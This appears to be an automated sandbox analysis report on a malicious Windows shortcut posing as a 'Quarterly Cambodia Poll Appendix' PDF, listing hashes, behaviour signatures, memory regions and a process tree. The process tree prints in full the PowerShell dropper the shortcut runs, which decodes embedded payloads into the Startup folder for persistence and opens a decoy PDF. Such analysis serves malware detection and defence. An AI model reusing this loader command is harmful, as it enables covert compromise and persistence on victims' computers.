Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    19-09-2024 14:46

General

  • Target

    Quarterly Cambodia Poll Appendix.pdf.lnk

  • Size

    2.2MB

  • MD5

    23d55b0f6a502c7ed3a70d41272b0732

  • SHA1

    36a2c2cd63e3ca23a7934cfb3e7a957f2b5363f8

  • SHA256

    cfbd704cab3a8edd64f8bf89da7e352adf92bd187b3a7e4d0634a2dc764262b5

  • SHA512

    53984a522f5629f3bf64e62f9855254c74497388f0632e76b00fb16fba7b7fb45ffe2c0db7cd0e7016847f2a5d966e42b3081a47d6fc9a067c6bd0d9d9e752af

  • SSDEEP

    49152:zrdLymX/jNT7IBkZw3xFdyaxDadhCtbdMuC4vmYrl4GRGjEOaUJiuw:

Score
7/10

Malware Config

Signatures

  • Drops startup file 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Quarterly Cambodia Poll Appendix.pdf.lnk"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2536
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c $t=$env:appdata+'\Microsoft\Windows\Start Menu\Programs\Startup';if(Get-ChildItem $env:temp -recurse 'Quarterly Cambodia Poll Appendix.pdf.lnk'){$k=New-Object IO.FileStream ($env:temp+'\'+((Get-ChildItem $env:temp -recurse 'Quarterly Cambodia Poll Appendix.pdf.lnk').Directory).Name+'\'+'Quarterly Cambodia Poll Appendix.pdf.lnk'),'Open','Read','ReadWrite'}else{$k=New-Object IO.FileStream 'Quarterly Cambodia Poll Appendix.pdf.lnk','Open','Read','ReadWrite'};$b=New-Object byte[](2298152);$k.Seek(2953,[IO.SeekOrigin]::Begin);$k.Read($b,0,2298152);$a=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64CharArray($b,0,$b.Length)) -split ':';copy 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe' ($t+'\d.exe');[IO.File]::WriteAllBytes($t+'\d.exe.config',[Convert]::FromBase64""String($a[0]));[IO.File]::WriteAllBytes($t+'\DomainManager.dll',[Convert]::FromBase64""String($a[1]));[IO.File]::WriteAllBytes($env:temp+'\e.pdf',[Convert]::FromBase64""String($a[2]));explorer ($env:temp+'\e.pdf');
      2⤵
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2112
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe" C:\Users\Admin\AppData\Local\Temp\e.pdf
        3⤵
        PID:2856
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      1⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:3012

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/2112-38-0x000007FEF5CDE000-0x000007FEF5CDF000-memory.dmp

    Filesize

    4KB

  • memory/2112-40-0x0000000001FE0000-0x0000000001FE8000-memory.dmp

    Filesize

    32KB

  • memory/2112-39-0x000000001B630000-0x000000001B912000-memory.dmp

    Filesize

    2.9MB

  • memory/2112-41-0x000007FEF5A20000-0x000007FEF63BD000-memory.dmp

    Filesize

    9.6MB

  • memory/2112-42-0x000007FEF5A20000-0x000007FEF63BD000-memory.dmp

    Filesize

    9.6MB

  • memory/2112-43-0x000007FEF5A20000-0x000007FEF63BD000-memory.dmp

    Filesize

    9.6MB

  • memory/2112-44-0x000007FEF5A20000-0x000007FEF63BD000-memory.dmp

    Filesize

    9.6MB

  • memory/2112-45-0x000007FEF5A20000-0x000007FEF63BD000-memory.dmp

    Filesize

    9.6MB

  • memory/2112-47-0x000007FEF5A20000-0x000007FEF63BD000-memory.dmp

    Filesize

    9.6MB

  • memory/2112-48-0x000007FEF5A20000-0x000007FEF63BD000-memory.dmp

    Filesize

    9.6MB

  • memory/3012-49-0x0000000003D10000-0x0000000003D20000-memory.dmp

    Filesize

    64KB